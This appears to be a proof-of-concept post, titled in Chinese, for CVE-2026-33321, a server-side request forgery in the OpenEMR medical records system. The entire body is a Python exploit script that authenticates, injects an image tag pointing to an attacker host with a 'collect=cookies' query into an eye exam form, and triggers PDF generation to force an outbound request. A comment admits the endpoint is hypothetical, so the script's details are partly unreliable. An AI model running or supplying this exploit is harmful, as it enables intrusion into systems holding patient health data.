CVE-2026-33321 OpenEMR OOB SSRF漏洞

# PoC for CVE-2026-33321 OpenEMR OOB SSRF import requests def trigger_ssrf(target_url, attacker_server, username, password): session = requests.Session() # 1. Authenticate to OpenEMR login_url = f"{target_url}/login.php" login_data = { "new_login_session_management": "1", "authUser": username, "clearPass": password } session.post(login_url, data=login_data) # 2. Prepare malicious payload for Eye Exam form # Using an img tag to trigger an HTTP request from the server during PDF generation payload = f'<img src="{attacker_server}/?collect=cookies" width="0" height="0" />' # 3. Submit the form with the payload # Endpoint is hypothetical based on typical OpenEMR structure form_url = f"{target_url}/interface/forms/eye_exam/save.php" form_data = { "form_eye_exam": payload, "process": "true" } response = session.post(form_url, data=form_data) if response.status_code == 200: print("[+] Payload injected successfully.") else: print("[-] Failed to inject payload.") return # 4. Trigger PDF generation (The Print action) # This forces the server to parse the HTML and fetch the external resource print_url = f"{target_url}/interface/forms/eye_exam/print.php?id=1" print_response = session.get(print_url) if print_response.status_code == 200: print("[+] PDF generation triggered. Check your server for the OOB request.") else: print("[-] Failed to trigger PDF generation.") if __name__ == "__main__": TARGET = "http://localhost/openemr" ATTACKER_CTRL = "http://attacker.com" trigger_ssrf(TARGET, ATTACKER_CTRL, "low_priv_user", "password")